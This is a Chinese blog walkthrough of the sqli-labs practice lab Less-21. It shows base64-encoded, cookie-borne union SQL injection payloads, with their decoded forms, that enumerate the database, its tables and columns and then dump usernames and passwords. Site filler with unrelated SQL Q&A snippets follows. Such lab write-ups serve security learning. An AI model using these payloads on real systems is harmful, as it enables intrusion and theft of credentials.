程序员经验分享-hwhale

sqli-labs (less-21)

2023-11-03

sqli-labs (less-21)

进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入

利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密


转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了
#以下过程均是base64转码后的结果

先输入一个

Jw== #'单引号


屏幕回显错误,根据错误信息判断闭合方式为’),并且为字符型注入

查看当前库

JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw== #') union select 1,2,database()#


查看security库下的所有表

JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpIw== #') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')#


查看users表下的所有字段

JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpIw== #') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#


查看username,password字段的所有的值

JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2Vycykj #') union select 1,2,(select group_concat(username,password) from security.users)#

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

sqlilabs

sql

sqli-labs (less-21) 的相关文章

  • 与 SQL 中的 IN 运算符相反

    我怎么能做相反的事情 换句话说 选择所有姓氏不是 Hansen 或 Pettersen 的人 WHERE lastname NOT IN Hansen Pettersen 请参阅 IN 和 NOT IN 运算符 部分SQLite 所理解的

  • RANK() OVER PARTITION 并重置 RANK

    如何获得在分区更改时重新启动的 RANK 我有这张表 ID Date Value 1 2015 01 01 1 2 2015 01 02 1

  • 如何将事物的组合映射到关系数据库?

    我有一个表 其记录代表某些对象 为了简单起见 我假设该表只有一列 这是唯一的ObjectId 现在我需要一种方法来存储该表中的对象组合 组合必须是唯一的 但可以是任意长度 例如 如果我有ObjectIds 1 2 3 4 我想存储以下组合

  • SQL 约束最小值/最大值?

    有没有办法为数字字段设置 SQL 约束 最小值应为 1234 最大值应为 4523 SQL Server 语法为the check约束 http technet microsoft com en us library ms179491 as

  • MySQL LIKE %string% 不够宽容。我还有什么可以用的吗?

    我有一位客户询问他们的搜索是否可以搜索公司名称 这些名称可以根据用户输入以多种格式进行搜索 例如数据库中存储的公司是 A J R Kelly Ltd 如果用户搜索 一个 J R Kelly 被发现 使用

  • PostgreSQL 在递归查询中找到所有可能的组合(排列)

    输入是一个长度为 n 的数组 我需要生成数组元素的所有可能组合 包括输入数组中元素较少的所有组合 IN j A B C OUT k A AB AC ABC ACB B BA BC BAC BCA 随着重复 所以AB BA 我尝试过这样的事情

  • 如何对多行的一列值求和?

    我有这个表 我想添加几行的 change 列的值 或者更准确地说 从 ne 值为零的行到 ne 值为零的下一行 不是第二个本身 任何答案将不胜感激 rn date ne change 0 2008 12 07 0 10330848398 1

  • 使用条件 SQL 统计每月汇总记录

    我有一张桌子 我们就叫他们桌子吧SUMMARYDATA NIP NAME DEPARTMENT STATUSIN STATUSOUT TOTALLOSTTIME A1 ARIA BB 2020 01 21 08 06 23 2020 01

  • Spring Data JPA 选择不同

    我有一个情况 我需要建立一个select distinct a address from Person a 其中地址是 Person 内的地址实体 类型的查询 我正在使用规范动态构建我的 where 子句并使用findAll Specifi

  • 在 PostgreSql 中计算百分比

    例如我有一个这样的表 string adm A 2 A 1 B 2 A 1 C 1 A 2 通过 SQL 查询 我想要这样的结果 string perc adm A 50 B 100 C 0 我想要每个字符串中数字 2 出现的百分比 我可以

  • 需要 SQL 查询澄清[关闭]

    Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案 我有一个由以下列组成的表 billid patientid doctorid fees 如何显示治疗多名患者的医生 尝试了以下代码并得到了

  • 何时在 mysql 中使用 Union [关闭]

    Closed 这个问题需要多问focused help closed questions 目前不接受答案 对于 Union 您会在什么现实情况下使用它 因为对我来说 对具有不同列用途 含义的两个表中的两个选择查询使用联合是没有意义的 例如

  • 使用联接更新表?

    我正在尝试使用表 B 中的数据更新表 A 我以为我可以做这样的事情 update A set A DISCOUNT 3 from INVOICE ITEMS A join ITEM PRICE QUNTITY B on A ITEM PRI

  • Snowflake 中的动态 SQL

    当我在雪花中运行动态 SQL 时 遇到以下错误 未完成对 SQL MAIN 的分配 因为值超出了变量的大小限制 它的大小是263 限制为 256 内部存储大小以字节为单位 这是代码 SET v G 1 SET v G1 v G VARCHA

  • Oracle SQL 函数中可以有 commit 语句吗

    在 SQL 函数中使用 COMMIT 语句是否可能 有意义 从技术上来说 答案是肯定的 你can请执行下列操作 create or replace function committest return number as begin upd

  • 如何拥有引用另一个表的检查约束?

    我在 SQL Server 2008 数据库中有以下表 tblItem 其中有一个ItemID field 好项目 它还有一个 ItemID 字段 并且有一个指向 tblItem 的外键 tblBadItem 它也有一个 ItemID 字段

  • SQL - 需要查找重复记录但排除反向事务

    我有一张交易表 偶尔会有 重复条目 如果 当管理员发现这些重复条目时 他们将撤销交易 从而创建负值 但由于监管要求 原始重复条目仍然保留 我想创建一个 SQL 查询 并使用 Crystal Reports 来制作报告 以便管理员轻松查找重复

  • 时间序列数据的自连接

    我需要一些帮助来完成我认为应该是相当简单的自连接查询 只需要将两条记录中匹配的开始时间和结束时间合并为一条记录 假设我的表中有以下内容 Time Event 08 00 Start 09 00 Stop 10 30 Start 10 45

  • 将布尔参数传递给 SQL Server 存储过程

    我早些时候问过这个问题 我以为我找到了问题所在 但我没有 我在将布尔参数传递给存储过程时遇到问题 这是我的 C 代码 public bool upload false protected void showDate object sende

  • 插入记录后如何从SQL Server获取Identity值

    我在数据库中添加一条记录identity价值 我想在插入后获取身份值 我不想通过存储过程来做到这一点 这是我的代码 SQLString INSERT INTO myTable SQLString Cal1 Cal2 Cal3 Cal4 SQ

随机推荐

  • win7+vue+element-ui初始化

    win7最高支持nodejs13 14版本 vue cli脚手架版本不能过高 我这边安装的是4 5 13的版本 1 卸载原有的vue cli 原版本为2 9 6 npm uninstall g vue cli 2 安装最新版的vue cli

  • 【DL】第8章 序列到序列的映射

    大家好 我是Sonhhxg 柒 希望你看完之后 能对你有所帮助 不足请指正 共同学习交流 个人主页 Sonhhxg 柒的博客 CSDN博客 欢迎各位 点赞 收藏 留言 系列专栏 机器学习 ML 自然语言处理 NLP 深度学习 DL fore

  • file转化为binary对象发送给后台

    具体代码如下 function filechange e var file filed get 0 files 0 var fileSize file size fileType file type if file name lastInd

  • 微信公众帐号开发教程第1篇-引言 .

    接触微信公众帐号已经有两个多月的时间了 在这期间 除了陆续完善个人公众帐号xiaoqrobot以外 还带领团队为公司开发了两个企业应用 一个是普通类型的公众帐号 另一个是会议类型的公众帐号 经过这3个公众帐号的开发 对目前微信公众平台开放的

  • 二叉树之小球下落问题(js)

    有一棵二叉树 最大深度为D 且所有叶子的深度都相同 所有结点从上到下从左到右编号为1 2 3 2 D 1 在结点1处放一个小球 它会往下落 每个内结点上都有一个开关 初始全部关闭 当每次有小球落到一个开关上时 它的状态都会改变 当小球到达一

  • HDFS——如何将文件从HDFS复制到本地

    下面两个命令是把文件从HDFS上下载到本地的命令 get 使用方法 Hadoop fs get ignorecrc crc 复制文件到本地文件系统 可用 ignorecrc选项复制CRC校验失败的文件 使用 crc选项复制文件以及CRC信息

  • windows网络模型

    完成端口 详解 解释的不错 http blog csdn net beyond cn article details 9336043 Windows Socket五种I O模型 http www cppblog com beautyking

  • Grayhill 072 16进制键盘扫描器的Verilog实现

    知识点 1 按键的机械原理 如何用一个module 模拟出按键的功能 体现的是抽象描述的能力 2 同步装置 因为按键输入的是异步信号 必须经过同步 因为s row 信号在经过同步装置后立马进入一个组合逻辑 为了消除潜在的冒险 这个例子中同步

  • Linux C/C++ PGO优化说明

    PGO Profile Guided Optimization 是指利用程序运行过程中采集到的 profile 数据 来重新编译程序以达到优化效果的 post link 优化技术 其原理认为 对于特征相似的 input 程序运行的特征也相似

  • RabbitMQ消息消费失败后的处理方案

    Q 业务系统之间通过MQ进行交互 当消费者发生未知异常时 消息消费失败 如何处理才保证消息的消费的可靠性 A 从如下几点考虑 何时ack 无论消息成功还是失败 都会ack 消息不会堆积在MQ中 只有成功才ack 消息堆积在MQ中 消费日志

  • 散列表的查找(哈希函数)

    哈希函数Hash 散列表的查找都是以关键字的比较为基础的 查找速度极快O 1 查找效率与元素个数n无关 直接找到 选取某个函数 依该函数按关键字计算元素的存储位置 并按此存放 给出关键字 gt 计算元素的存储位置 并存放 查找时 给出关键字

  • 2020年“华为杯”第十七届中国研究生数学建模竞赛B题心得(满纸荒唐言,一把辛酸泪)

    满纸荒唐言 一把辛酸泪 都云作者痴 谁解其中味 纪念2016 2020所有的数学建模论文 古人说得好 书到用时方恨少 事非经过不知难 做数学建模的我 方法用时真恨少 建模经过更知难 2020年9 17 21 应该是我最后一次参加数学建模比赛

  • 多线程:Java两个线程,一个打印A-Z,另一个打印1-26,输出结果:A1 B2 C3 ...... Z26

    最近看到一个题 很有意思 就是在Java里实现两个线程 一个线程打印字母 也就是 ABCD Z 另一个线程打印数字 也就是 1234 26 但是这两个线程需要交替打印 第一次字母线程先打印A 然后数字线程打印1 第二次字母线程先打印B 然后

  • vue & animate.css 使用讲解

    Animate css 库 官网 https animate style Vue 讲解 transition 官网 https cn vuejs org v2 guide transitions html 1 安装库 npm install

  • 人工智能是什么?人工智能行业前景如何

    人工智能是什么 人工智能行业前景如何 很多人都对人工智能领域感兴趣 那么究竟什么是人工智能 人工智能 英语 Artificial Intelligence 缩写为AI 亦称智械 机器智能 指由人制造出来的机器所表现出来的智能 通常人工智能是

  • 如何在eclipse中打开查看jar包(.class文件)

    打开Help Eclipse Marketplace 输入Enhanced Class Decompiler 选择插件 点解Install 安装完毕后重启 第一次打开 class文件 选择文件 点击鼠标右键 然后选择open class w

  • TTL设置多少合适?阿里域名解析TTL设置多少

    TTL设置多少合适 阿里域名解析TTL设置多少 TTL是Time To Live的缩写 指生存时间 而域名解析中提到的TTL值是指全国各地的localdns服务器中缓存解析结果的时间周期 简单来说就是一个网站www sss com 主机服务

  • L1-096 谁管谁叫爹 - java

    L1 096 谁管谁叫爹 时间限制 200 ms 内存限制 64 MB 题目描述 咱俩谁管谁叫爹 是网上一首搞笑饶舌歌曲 来源于东北酒桌上的助兴游戏 现在我们把这个游戏的难度拔高一点 多耗一些智商 不妨设游戏中的两个人为 A 和 B 游戏开

  • windows server 2012 安装完只有命令行

    今天在安装完windows server 2012 只有命令行 发现没有桌面 然后在别人的提醒下 才发现忘记安装gui了 这个时候 我也懒的重新安装一遍 所以就在网上找如何能够解决问题的方法 下面为解决方案 dism online enab

  • sqli-labs (less-21)

    sqli labs less 21 进入21关 输入用户名与密码 发现跟20关基本一样 这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager 抓取到cookie信息后 发现竟然是一串字母 这里就很懵了 但我们仔细

热门标签